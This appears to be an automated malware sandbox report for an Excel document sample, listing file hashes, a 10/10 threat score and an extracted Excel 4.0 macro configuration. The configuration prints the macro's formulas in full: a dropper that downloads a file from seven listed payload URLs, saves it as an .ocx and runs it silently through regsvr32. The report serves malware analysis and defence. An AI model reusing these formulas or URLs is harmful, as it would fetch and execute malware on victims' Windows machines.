General

  • Target

    5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6

  • Size

    33KB

  • Sample

    240909-12gfsasfpj

  • MD5

    325803f2534dac63d8d714da437fad96

  • SHA1

    e3614f4c8e0934e85fa62ebdbed3fe9df50cb1fe

  • SHA256

    5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6

  • SHA512

    72dc47a8477ba519475d6b9e7d760f7064b07674a5c7e9aa011883ea09bd275047c2f528d7e44649e7e21af86b2d94b9cfda0e2caebe03c70b46db9e8661957b

  • SSDEEP

    768:LC+3ocveEI8vp96wU1+FCh+JJwthS0U8GueOxhbpL5:G+3ozuT6Z4FLLwtDmKpL5

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0)
    =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E27<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx")
    =RETURN()

Targets

    • Target

      5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6

    • Size

      33KB

    Score
    3/10
